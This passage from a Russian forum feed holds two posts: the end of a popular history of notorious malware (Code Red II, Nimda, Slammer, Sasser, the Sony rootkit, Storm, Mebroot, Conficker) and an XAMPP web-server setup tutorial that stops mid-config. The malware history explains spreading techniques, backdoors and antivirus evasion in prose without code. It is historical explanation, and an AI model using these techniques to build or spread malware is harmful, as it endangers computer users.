дому.&lt;br /&gt;В августе этого же года начал распространяться новый червь Code Red II, код которого, несмотря на схожее название, был создан заново и предоставлял владельцам полный контроль над зараженными машинами, копируя файл cmd.exe в каталог \inetpub\scripts\ ISS-сервера. В отличие от оригинального Code Red, клон старался атаковать хосты в той же подсети и не допускал одновременного запуска себя на одной системе.&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://s45.radikal.ru/i107/1008/36/31fea6e53654.bmp&quot; alt=&quot;http://s45.radikal.ru/i107/1008/36/31fea6e53654.bmp&quot; /&gt;&lt;br /&gt;Code Red дефейсил системы с английской локалью&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;&lt;span style=&quot;display: block; text-align: center&quot;&gt;&lt;strong&gt;Nimda&lt;/strong&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Запустившегося в сентябре 2001 года червя ну никак не могли не связать с деятельностью Алькайды, заодно рассказывая о мощных технологиях, применяемых в новой заразе. Но если присказки о терроризме были выдумкой журналистов, то очевидная продвинутость нового червя была на лицо. Фишка Nimda заключалась сразу в нескольких каналах распространения, благодаря которым ему удалось в считанные минуты распространиться по Сети. Разберемся по порядку.&lt;br /&gt;1. Наибольший пробив был получен за счет эксплоита, который использовал уязвимость в Internet Explore’е, позволяющую автоматически запускать приаттаченный к письму файл. Прикрепленный к письму README.EXE (написаный, кстати, на С++) беспрепятственно запускался на машине при простом открытия письма, и комфортно начинал свое распространение. Причем, для поиска новых адресатов вирус кропотливо сканировал текстовые документы на жестком диске, а также запрашивал с помощью специальной MAPI-функции список адресатов с сервера Microsoft Exchange.&lt;br /&gt;2. Другой способ распространения — расшаренные ресурсы в локалке. После сканирования всех доступных шар Nimda создавал там файлы с почтовыми сообщениями, имеющие расширение .EML и .NWS.Открытие таких файлов происходит в почтовой программе, что автоматически влекло за собой заражение, как если бы письмо просто пришло по почте.&lt;br /&gt;3. Не могли забыть создатели и про дырявый IIS, уязвимость в котором уже использовали другие черви. Поэтому Nimda довольно эффективно пробивал майкросовский веб-демон с помощью уязвимости directory traversal. В случае заражения веб-сервера на нем случайным образом выбирались странички, откуда начиналась загрузка вируса посетителям.&lt;br /&gt;4. И еще интересный ход — Nimda не стеснялся и активно использовал для распространения бекдоры, оставленные в системах червями Code Red II и sadmind/IIS.&lt;br /&gt;Добавим, что Nimda имел опасный побочный эффект, который мог допустить утечку конфиденциальной информации с зараженных компьютеров. Червь добавлял пользователя под именем «Guest» в группу пользователей «Администраторы». Таким образом, обычные гости получали полный доступ к ресурсам компьютера. Более того, все локальные диски открывались через шары для полного доступа.&lt;br /&gt;Автор этого вируса официально не найден, но в теле червя содержится строка, указывающая, что создатель из Китая: «Concept Virus(CV) V.5, Copyright(C)2001 R.P.China»&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://s43.radikal.ru/i099/1008/1c/43dae9d2be92.png&quot; alt=&quot;http://s43.radikal.ru/i099/1008/1c/43dae9d2be92.png&quot; /&gt;&lt;br /&gt;разные способы заражения червя Nimda&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;&lt;span style=&quot;display: block; text-align: center&quot;&gt;&lt;strong&gt;Slammer&lt;/strong&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Незадачливые жители стран Северной Америки были сильно удивлены, когда 25 января многие банкоматы попросту перестали работать. Во всем мире со сбоями работали службы по заказу и резервированию авиабилетов, многие сервисы вообще не были доступны. Но набивший оскомину финансовый кризис тут вовсе не причем — это лишь всплеск активности червя Slammer. Активность впервые замечена в 12:30 по среднеатлантическому времени, а к 12:33 количество зараженных машин удваивалось каждые 8.5 секунд.&lt;br /&gt;В основе червя лежала уязвимость в Microsoft SQL Server, концепция которой была представлена David Litchfield на конференции BlackHat. Отправляя на 1434 скомпрометированный пакет, вирус мог выполнить на удаленной машине произвольный код и, в свою очередь, продолжить распространение. По различным отчетам сообщается, что вирусу удалось заразить 75.000 машин за каких-то десять минут, — но как? Уязвимый модуль IIS, позволяющий приложениям автоматически обращаться к нужной базе данных, принимал запросы как раз по UDP, а тело вируса, составляющее всего 376 байт, отлично помещалось в один единственный UDP-пакет. В результате Slammer не использовал тормозной TCP, требующий постоянных квитков-подтверждений, а рассылал себя по ненадежному UDP со скоростью несколько десятков запросов в секунду! Несмотря на то, что патч для уязвимости был выпущен за 6 месяцев до эпидемии, а вирус никак не проявлял себя на зараженной машине, последствия от Slammer’а были колоссальными. Роутеры и маршрутизаторы на магистралях были настолько перегружены трафиком, что лавинообразно выбивали другу друга в конце концов отключив некоторые бэкбоны. Южная Корея была полностью отрублена от инета и находилась в таком состоянии почти 24 часа. Только представь: никакого интернета и мобильной связи с внешним миром для 27 миллионов человек. Забавно, что многие жертвы даже не знали, что на их машине установлена такая специфическая вещь, как SQL.&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://s52.radikal.ru/i135/1008/e3/4f2e35740ced.bmp&quot; alt=&quot;http://s52.radikal.ru/i135/1008/e3/4f2e35740ced.bmp&quot; /&gt;&lt;br /&gt;сетевая активность Slammer&#039;a&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;&lt;span style=&quot;display: block; text-align: center&quot;&gt;&lt;strong&gt;Sasser&lt;/strong&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Уж что-что, а окошко System Shutdown, инициированное NT AUTHORITY\SYSTEM с обратным отсчетом и сообщением о принудительной перезагрузке компьютера видел почти каждый — годом ранее, во время эпидемии Blaster’а, либо же в 2004, когда стал бушевать во многом похожий на него Sasser. Принципиальная разница червей в том, что они используют критические уязвимости в разных службах. Для размножения Sasser использует баг переполнения буфера в службе Local Security Authority Subsystem Service (LSAS) — отсюда и название червя. Написанное на С++ тело Sasser в первоначальной версии открывает 128 параллельных потоков, и, используя специальный алгоритм по генерации IP-адресов, пытается найти системы с незащищенным 445 портом и уязвимым сервисом. Сплоит работал на «ура», правда, приводил к ошибке на системе пользователя. Sasser открывал на 9997 порту шелл, через который далее и заливалось все необходимое. Само тело червя без лишнего геморроя просто передавалось по протоколу через FTP, причем сервер также открывался на зараженных компьютерах на 5554 порту. Как часто бывает, шелл-код сплоита отличается от системы к системе, поэтому Sasser предварительно проверял версии удаленной системы, чтобы выбрать правильный набор параметров для атаки.&lt;br /&gt;Оригинальная версия червя Sasser распространялась достаточно медленно, но через несколько дней в Сети были выпущены модификации, распространяющиеся гораздо быстрее. К этому моменту число зараженных машин измерялось сотнями тысяч, а в пике эпидемии речь шла о миллионах. В Финляндии были отменены рейсы местной авиакомпании, во многих странах закрыты некоторые отделения крупнейших банков. Автором заразы оказался 18-летний немецкий студент Свен Яшан, хотя изначально разрабатывался «русский след». Юного вредителя заложил кто-то из своих, позарившись на обещанное Microsoft’ом награждение в 250.000 баксов. Помимо Sasser, на компьютере парнишки нашли еще и многочисленные модификации червя Netsky.&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://s52.radikal.ru/i137/1008/72/b9705946f08c.bmp&quot; alt=&quot;http://s52.radikal.ru/i137/1008/72/b9705946f08c.bmp&quot; /&gt;&lt;br /&gt;ошибка системы после заражения Sasser&#039;om&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;&lt;span style=&quot;display: block; text-align: center&quot;&gt;&lt;strong&gt;Sony rootkit&lt;/strong&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Забавный факт: это единственный руткит, который распространялся легально! Win32/Rootkit.XCP, или «sony rootkit», является частью системы защиты аудио-CD,выпускаемых Sony BMG. Растроенная всепоглощающим пиратством компания решила бороться с нелегальным копированием с помощью DRM-компонентов (Digital Rights Management), а в попытке скрыть их присутствие в системе обратилась в компанию First 4 Internet, чтобы те написали маскирующий руткит. В итоге, система защиты дисков вместе с руткитом стала инсталлироваться на компьютер пользователя автоматически, когда в привод вставляется защищенный компакт диск. После установки, в системе появлялись два новых сервиса, которые и выполняли все функции. Установленный драйвер $sys$aries (aries.sys) скрывает все файлы и ключи в реестре, которые начинаются с «$sys$» посредством перехвата нативных API-функций. Win32/Rootkit.XCP отслеживает обращения к System Service Table (SST) и перехватывает обращения к функциям: NtCreateFile, NtEnumerateKey, NtOpenKey, NtQueryDirectoryFile, NtQuerySystemInformation. В результате удается скрыть присутствие ключей в реестре, папок, файлов и процессов.&lt;br /&gt;Ты спросишь: а в чем, собственно, трабл? Ну, скрывает этот руткит работу нужных ему компонентов, что с того? Очень просто. Сразу после появления руткита, Марк Руссинович в своем блоге рассказал о многочисленных брешах в собственной защите программы. И был прав: очень скоро механизм, предназначенный для сокрытия файлов и процессов, быстро приспособили для своих нужд кодеры вирусов. Более того, распространение этого ноу-хао само по себе приводило к нестабильности системы, зависанию компьютера и потере данных из-за кривых драйверов, установленных в систему. И даже тогда, когда Sony выпустила специальную тулзу, избавиться от это дряни полностью было очень и очень затруднительно.&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://s61.radikal.ru/i171/1008/6e/19a1f694d07c.bmp&quot; alt=&quot;http://s61.radikal.ru/i171/1008/6e/19a1f694d07c.bmp&quot; /&gt;&lt;br /&gt;BSOD из-за корявых драйверов Sony rootkit&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;&lt;span style=&quot;display: block; text-align: center&quot;&gt;&lt;strong&gt;Warezov&lt;/strong&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;На дворе — 2006 год, только вот ушастые пользователи по-прежнему открывают все вложения в письмах, а программно им мало кто запрещает это делать. Результат? Огромный ботнет Warezov (он же Stration), который авторы сумели собрать за счет одноименного червя, рассылаемого по email. Никаких сплоитов и уязвимостей, — социальная инженерия и людская тупость. И ведь повсю трубят: «Не открывай вложений» — так ведь все равно кликают. Особенность червя Warezov — в огромном количестве вариаций, которые появлялись, как грибы после дождя. Был момент, когда новые модификации появлялись чуть ли не раз в 30 минут. Даже с обновленными антивирусными базами многие юзеры оставались не у дел. Впоследствии, когда на веб-серверах глобально начали вычищать все письма со зловредными аттачами, модификации перекинулись на IM-сети. А один из вариантов Warezov стал первым червем, который распространялся через Skype!&lt;br /&gt;Как и подобает трою для ботнета, тело Warezov позволяло владельцам загрузить на компьютер любую заразу. Червь содержит в себе список жестко прописанных URL-адресов (что, конечно, минус), которые он проверяет на наличие файлов. В случае если по какому-либо из этих адресов будет размещен файл, он загрузится в систему и запустится. Основной модуль Warezov способен завершать различные процессы, а также останавливать и удалять службы антивирусных программ и персональных брандмауэров. Для организации рассылки червь использует собственный SMTP-сервер. Главное использование ботнета — это, конечно же, спам. Однако многие ноды служили для хостинга так называемых fast-flux платформ, позволяя спамерам прятать настоящее расположение их спамерских сайтов за IP-адресом жертвы. IP менялся настолько часто, что его невозможно было прикрыть. Warezov достигал этого двумя средствами: во-первых, reverse HTTP proxy, которая получала контент с настоящего (скрываемого) сайта, а также DNS-сервера, на котором специальная версия Bind под Windows меняла записи по нужному алгоритму.&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://s005.radikal.ru/i212/1008/52/00ec3e2aec81.bmp&quot; alt=&quot;http://s005.radikal.ru/i212/1008/52/00ec3e2aec81.bmp&quot; /&gt;&lt;br /&gt;временный файл Warezov&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;&lt;span style=&quot;display: block; text-align: center&quot;&gt;&lt;strong&gt;Storm&lt;/strong&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Ботнет, созданный с помощью червя Storm, можно смело назвать произведением искуства. Децентрализованная P2P-сеть, в которой большинство хостов сидит тихо и ждет указаний. Доменные имена разрешаются в постоянно меняющиеся IP-адреса (опять же fast-flux domains). Часть кода червя — полиморфная. В пике — более миллиона инфицированных хостов. Как это удалось?&lt;br /&gt;Эпидемия червя началась с компьютеров в Европе и Соединенных Штатах 19 января 2008 года, когда, прикрываясь темой урагана в Европе, пользователям повалились письма с предложением открыть вложенный файл с названиями Full Clip.exe, Full Story.exe, Read More.exe или Video.exe.&lt;br /&gt;Все попавшиеся на удочку машины автоматически объединялись в ботнет, но в отличие от других сетей, он не использовал специальный управляющий сервер, доступ к которому легко перекрыть. Принцип управления Storm больше напоминает пиринговую сеть, в которой зараженные ноды подключаются к своему управляющему хосту (он руководит обычно 30-45 зомби), а хосты взаимодействуют между друг другом. Причем роль хоста в случае необходимости может занять любая из нод. Вся сеть устроена так, что полного списка нодов нет ни у кого, поэтому точные размеры ботнета так и остались загадкой. По разным подсчетам, он варьировался от одного до нескольких миллионов машин.&lt;br /&gt;Помимо функций по работе с ботнетом, Storm устанавливает в системе руткит: Win32.agent.dh, посредством которого держатели ботнета могли стащить любую конфиденциальную инфу, рассылать спам и устраивать мощные DDoS-атаки.&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://s40.radikal.ru/i087/1008/a2/b31d7cc1713a.png&quot; alt=&quot;http://s40.radikal.ru/i087/1008/a2/b31d7cc1713a.png&quot; /&gt;&lt;br /&gt;техника fast-flux в картинках&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;&lt;span style=&quot;display: block; text-align: center&quot;&gt;&lt;strong&gt;Merboot&lt;/strong&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Загрузочные вирусы, о которых все благополучно успели забыть, возвращаются. В 2005 году на хакерской конференции Black Hat специалисты eEye Digital Security продемонстрировали концепт так называемого буткита, размещающего в загрузочном секторе диска код, который перехватывает загрузку ядра Windows и запускает бэкдор с возможностью удаленного управления по локальной сети. Презентация прошла на ура, а в 2008 году, после длительного затишья в области руткитов, выстрелил Mebroot. Новый троян использовал представленную еще в 2005 году идею и размещал свое тело в бут-секторе диска, после чего вносил модификации в ядро Винды, которые затрудняли обнаружение вредоносного кода антивирусами. Подцепить заразу мог кто угодно: компы заражались через свежие сплоиты с популярных сайтов. Вредоносный код сначала изменяет MBR (главная загрузочная запись), записывает руткит-части в сектора диска, извлекает из себя и устанавливает бэкдор в Windows, после чего самоудаляется. В результате заражения, в MBR размещаются инструкции, передающие управление основной части руткита, размещенного в разных секторах жесткого диска. Именно эта часть, уже после загрузки системы, перехватывает API-функции и скрывает зараженный MBR. Кроме традиционных функций по сокрытию своего присутствия в системе, вредоносный код устанавливает в Windows бэкдор, который занимается кражей банковских аккаунтов.&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://s43.radikal.ru/i100/1008/4c/239c64e6ba49.bmp&quot; alt=&quot;http://s43.radikal.ru/i100/1008/4c/239c64e6ba49.bmp&quot; /&gt;&lt;br /&gt;с Merboot&#039;om до сих пор справляются далеко не все антивирусы&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;&lt;span style=&quot;display: block; text-align: center&quot;&gt;&lt;strong&gt;Downadup&lt;/strong&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Червя, нашумевшего в январе, называют по-разному: Downadup, Conficker, Kido. Важно одно: новой малваре за несколько дней удалось заразить миллионы компьютеров, и собранный ботнет функционирует до сих пор. Разработчикам удалось лихо диверсифицировать способы распространения, объединив в одном черве сразу несколько успешных методик. Самый эффективный способ — приватный сплоит, использующий непропатченную систему с уязвимостью переполнения буфера MS08-067 в сервисе «Сервер» (патч вышел еще в октябре). Для этого червь отсылает удаленной машине специальным образом сформированный RPC- запрос, вызывающий переполнение буфера при вызове функции wcscpy_s в библиотеке netapi32.dll. На компьютере запускается специальный код-загрузчик, который скачивает с уже зараженной машины исполняемый файл червя и запускает его.&lt;br /&gt;Кроме этого, червь отлично тиражирует себя через «Сетевое окружение», перебирая пароль администратора к системной шаре ADMIN$. А давно известный способ распространения через флешки претерпел изменения: в результате обфускации Autorun.inf (разработчики просто добавили в файл кучу мусора) удалось обмануть многие сигнатурные антивирусы. Несколько способов = максимальный эффект! Другая ключевая особенность заключается в том, как червь скачивает на зараженную машину трояна (для дальнейшей рассылки вируса, DDoS’а и т.д.). Разработчики отказались от размещения файлов на каком-то жестко зафиксированном серваке. Вместо этого код червя получает на нескольких популярных ресурсах текущую дату и по ней генерирует список из 250 доменов, используя специальный алгоритм. Задача хозяев ботнета — заблаговременно эти домены зарегистрировать и разместить там файлы для загрузки. Противостоять этому не столько сложно, сколько дорого.&lt;br /&gt;Перехватывая API-вызовы, отвечающие за обращение к DNS, заразе долгое время удавалось сдерживать антивирусы, которые банально не могли обновиться, обращаясь к заблокированным доменам, содержащим слова kaspersky, nod, symantec, microsoft и т.д.&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://s58.radikal.ru/i162/1008/f0/6c5c767fd900.png&quot; alt=&quot;http://s58.radikal.ru/i162/1008/f0/6c5c767fd900.png&quot; /&gt;&lt;br /&gt;разные способы распространения червя Downadup&lt;/p&gt;</description>
			<author>mybb@mybb.ru (administrator)</author>
			<pubDate>Mon, 07 Mar 2011 23:48:58 +0300</pubDate>
			<guid>https://forumis.fludilka.su/viewtopic.php?pid=5#p5</guid>
		</item>
		<item>
			<title>Установка и настройка сервера XAMPP на Windows</title>
			<link>https://forumis.fludilka.su/viewtopic.php?pid=4#p4</link>
			<description>&lt;p&gt;&lt;span style=&quot;color: green&quot;&gt;Установка и настройка сервера XAMPP на Windows&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Для начала рассмотрим что из себя представляет веб-сервер XAMPP и сравним версии для Windows.&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;XAMPP — кроссплатформенная сборка веб-сервера, содержащая Apache, MySQL, интерпретатор скриптов PHP, язык программирования Perl и большое количество дополнительных библиотек, позволяющих запустить полноценный веб-сервер.&lt;/strong&gt;&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: green&quot;&gt;&lt;span style=&quot;display: block; text-align: center&quot;&gt;Установка веб-сервера XAMPP&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;1.&lt;/strong&gt; Начинаем установку XAMPP. Откроется окно, в котором нам предлагается выбрать путь для размещения сервера. По-умолчанию это диск C:\. Я не буду изменять путь и установлю сервер на предложенный диск. Нажимаем кнопку Install и ждем пока дистрибутив полностью распакуется.&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://www.bormotuhi.net/imagehosting/2010/09/15/14c908ec79a2f3.jpg&quot; alt=&quot;http://www.bormotuhi.net/imagehosting/2010/09/15/14c908ec79a2f3.jpg&quot; /&gt;&lt;/p&gt;
						&lt;p&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://www.bormotuhi.net/imagehosting/2010/09/15/14c908ed6ad7c0.jpg&quot; alt=&quot;http://www.bormotuhi.net/imagehosting/2010/09/15/14c908ed6ad7c0.jpg&quot; /&gt;&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt; 2&lt;/strong&gt;.После распаковки дистрибутива запустится командная строка, далее основная установка будет происходить через нее. XAMPP предлагает создать ярлыки на рабочем столе и в меню пуск, нажимаем enter.&lt;/p&gt;
						&lt;p&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://www.bormotuhi.net/imagehosting/2010/09/15/14c908f366151c.jpg&quot; alt=&quot;http://www.bormotuhi.net/imagehosting/2010/09/15/14c908f366151c.jpg&quot; /&gt;&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;3.&lt;/strong&gt; Теперь у нас спрашивают, правильно ли выбран каталог установки XAMPP, по-умолчанию сервер будет располагаться по следующему адресу C:\xampp, нажимаем enter.&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://www.bormotuhi.net/imagehosting/2010/09/15/14c908f66be925.jpg&quot; alt=&quot;http://www.bormotuhi.net/imagehosting/2010/09/15/14c908f66be925.jpg&quot; /&gt;&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;4.&lt;/strong&gt; Хотим ли мы установить портативную версию? Нажимаем enter, т.к. XAMPP устанавливается на жесткий диск.&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://www.bormotuhi.net/imagehosting/2010/09/15/14c908f9742cc6.jpg&quot; alt=&quot;http://www.bormotuhi.net/imagehosting/2010/09/15/14c908f9742cc6.jpg&quot; /&gt;&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;5.&lt;/strong&gt; Окончательная установка XAMPP. Нажимаем enter для продолжения.&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://www.bormotuhi.net/imagehosting/2010/09/15/14c908fb81c767.jpg&quot; alt=&quot;http://www.bormotuhi.net/imagehosting/2010/09/15/14c908fb81c767.jpg&quot; /&gt;&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;6.&lt;/strong&gt; Автоматический выбор часового пояса. Нажимаем enter.&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://www.bormotuhi.net/imagehosting/2010/09/15/14c908fe7d1deb.jpg&quot; alt=&quot;http://www.bormotuhi.net/imagehosting/2010/09/15/14c908fe7d1deb.jpg&quot; /&gt;&lt;br /&gt;&lt;strong&gt;7.&lt;/strong&gt; Запустим панель управления XAMPP (XAMPP Control Panel), выбираем 1 и жмем enter.&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;8.&lt;/strong&gt; Открылась панель управления сервером. Закрываем командную строку.&lt;/p&gt;
						&lt;p&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://www.bormotuhi.net/imagehosting/2010/09/15/14c90907f0f098.jpg&quot; alt=&quot;http://www.bormotuhi.net/imagehosting/2010/09/15/14c90907f0f098.jpg&quot; /&gt;&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: yellow&quot;&gt;Подсказки по панели управления:&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Checkboxes (Svc) — устанавливает модуль в качестве службы Windows (если вы хотите запускать какой либо модуль (Apache, MySQL и т.д.) как службу, то отмечаем соответствующие флажки)&lt;br /&gt;Admin — запускует администрирование модулем (Admin напротив модуля Apache — откроет окно приветствия XAMPP, выбираем язык. И попадаем в веб-интерфейс XAMPP, здесь можно проверить демонстрационные примеры в разделе Demos, узнать информацию о модулях и т.д. Admin напротив модуля MySQL — запустит phpMyAdmin)&lt;br /&gt;Shell — запуск командной строки для работы с сервером;&lt;br /&gt;Setup — открывает командную строку для настройки XAMPP;&lt;br /&gt;Port-Check — проверка портов;&lt;br /&gt;Explore — открывает папку в которую установлен XAMPP, в нашем случае C:\xampp;&lt;br /&gt;SCM — открывает окно управления службами Windows;&lt;br /&gt;Refresh — обновление состояния модулей;&lt;/p&gt;
						&lt;p&gt;Запускается XAMPP с помощью ярлыка на рабочем столе или в меню пуск, если же вы при установке отказались от создания ярлыков, вы можете запустить XAMPP с помощью файла xampp-control.exe в директории C:\xampp, там же вы можете увидеть все остальные ярлыки, которыми можно запустить отдельные модули, деинсталировать XAMPP и т.п.&lt;/p&gt;
						&lt;p&gt;Иконка XAMPP удобно сидит в трее и при щелчке левой кнопки мыши открывает панель управления (XAMPP Control Panel).&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;9. &lt;/strong&gt;Запускаем модули Apache и MySQL (кнопки Start), набираем в браузере localhost (или жмем Admin напротив модуля Apache):&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://www.bormotuhi.net/imagehosting/2010/09/15/14c9090dc0600d.jpg&quot; alt=&quot;http://www.bormotuhi.net/imagehosting/2010/09/15/14c9090dc0600d.jpg&quot; /&gt;&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;10.&lt;/strong&gt; При первом запуске откроется страница приветствия, выбираем один из предложенных языков:&lt;/p&gt;
						&lt;p&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://www.bormotuhi.net/imagehosting/2010/09/15/14c9091040bdd4.jpg&quot; alt=&quot;http://www.bormotuhi.net/imagehosting/2010/09/15/14c9091040bdd4.jpg&quot; /&gt;&lt;/p&gt;
						&lt;p&gt;&lt;strong&gt;11.&lt;/strong&gt; Попадаем в веб-интерфейс XAMPP, здесь вы можете ознакомиться документацией, примерами в разделе Demos и т.д.:&lt;/p&gt;
						&lt;p&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://www.bormotuhi.net/imagehosting/2010/09/15/14c909144063c6.jpg&quot; alt=&quot;http://www.bormotuhi.net/imagehosting/2010/09/15/14c909144063c6.jpg&quot; /&gt;&lt;/p&gt;
						&lt;p&gt;В разделе Security находятся настройки безопасности:&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://www.bormotuhi.net/imagehosting/2010/09/15/14c909169b3574.jpg&quot; alt=&quot;http://www.bormotuhi.net/imagehosting/2010/09/15/14c909169b3574.jpg&quot; /&gt;&lt;/p&gt;
						&lt;p&gt;Перейдя по указанной ссылке http://localhost/security/xamppsecurity.php, можно задать пароль для администратора баз данных MySQL и можно установить пароль на директорию XAMPP для ограничения доступа из локальной сети:&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://www.bormotuhi.net/imagehosting/2010/09/15/14c90918fa89bf.jpg&quot; alt=&quot;http://www.bormotuhi.net/imagehosting/2010/09/15/14c90918fa89bf.jpg&quot; /&gt;&lt;/p&gt;
						&lt;p&gt;Итак, мы установили и ознакомились с веб-сервером XAMPP, теперь настало время создать тестовую страницу и разместить наш проект.&lt;/p&gt;
						&lt;p&gt;Для того чтобы создать новый сайт на локальном веб-сервере, необходимо создать папку с названием сайта в папке C:\xampp\htdocs\, например blog и создадим там тестовый php-скрипт с кодом:&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: yellow&quot;&gt;&amp;lt;?php echo &#039;Hello world!&#039;; ?&amp;gt;&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Сохраним как index.php. Структура папок:&lt;/p&gt;
						&lt;p&gt;Переходим в браузере по адресу http://localhost/blog/ и, если все сделано правильно, видим приветствие «Hello world!», тем самым мы протестировали работоспособность сервера:&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://www.bormotuhi.net/imagehosting/2010/09/15/14c9091be0488f.jpg&quot; alt=&quot;http://www.bormotuhi.net/imagehosting/2010/09/15/14c9091be0488f.jpg&quot; /&gt;&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: yellow&quot;&gt;Веб-сервер можно установить и другим способом, для этого необходимо распаковать инсталятор или ZIP-архив в любое удобное для вас место на жестком диске, название папки xampp можно переименовать, например в server и запустить установку с помощью файла setup_xampp.bat в этой папке, повторить все шаги описанные выше. Если вы устанавливаете XAMPP впервые, то рекомендую на время первого ознакомления не менять названия папок и установить веб-сервер по дефолту, чтобы потом не искать ошибок, которые могут возникнуть при указании неверных путей для виртуальных хостов, речь о которых пойдет ниже.&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: green&quot;&gt;Настройка виртуальных хостов&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Если мы хотим хранить свои проекты в другой папке (например, Мои документы) или локальная версия сайта должна работать при переходе по адресу wwwblog.ru вам необходимо разобраться с настройкой виртуальных хостов, об этом и пойдет речь в данном подразделе.&lt;/p&gt;
						&lt;p&gt;Предположим наш сайт должен храниться на диске C в папке my_projects (C:\my_projects), в браузере он должен открываться по адресу wwwblog.local или blog.local.&lt;/p&gt;
						&lt;p&gt;Создадим в папке my_projects папку с названием blog.local, в ней создадим папки www и logs. В папку www положим наш тестовый скрипт index.php.&lt;/p&gt;
						&lt;p&gt;Вот так это будет выглядеть в файловой системе Windows:&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://www.bormotuhi.net/imagehosting/2010/09/15/14c9092069414e.png&quot; alt=&quot;http://www.bormotuhi.net/imagehosting/2010/09/15/14c9092069414e.png&quot; /&gt;&lt;/p&gt;
						&lt;p&gt;Теперь перейдем к настройке виртуальных хостов. Открываем в текстовом редакторе файл httpd-vhosts.conf, расположенный по следующему адресу: C:\xampp\apache\conf\extra.&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;Примечание: рекомендую для большего удобства создать сразу ярлык для этого файла, например в папке C:\xampp, чтобы потом можно было быстро добавлять новые виртуальные хосты.&lt;/p&gt;
						&lt;p&gt;Все что находится в файле httpd-vhosts.conf мы трогать не будем, а просто добавим наши хосты (просто скопируйте и вставьте в файл приведенный ниже код)&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 31.5em&quot;&gt;&lt;pre&gt;NameVirtualHost *:80

&amp;lt;VirtualHost *:80&amp;gt;
    DocumentRoot &amp;quot;C:\xampp\htdocs&amp;quot;
    ServerName localhost
&amp;lt;/VirtualHost&amp;gt;
&amp;lt;VirtualHost *:80&amp;gt;
    ServerAdmin webmaster@blog.local
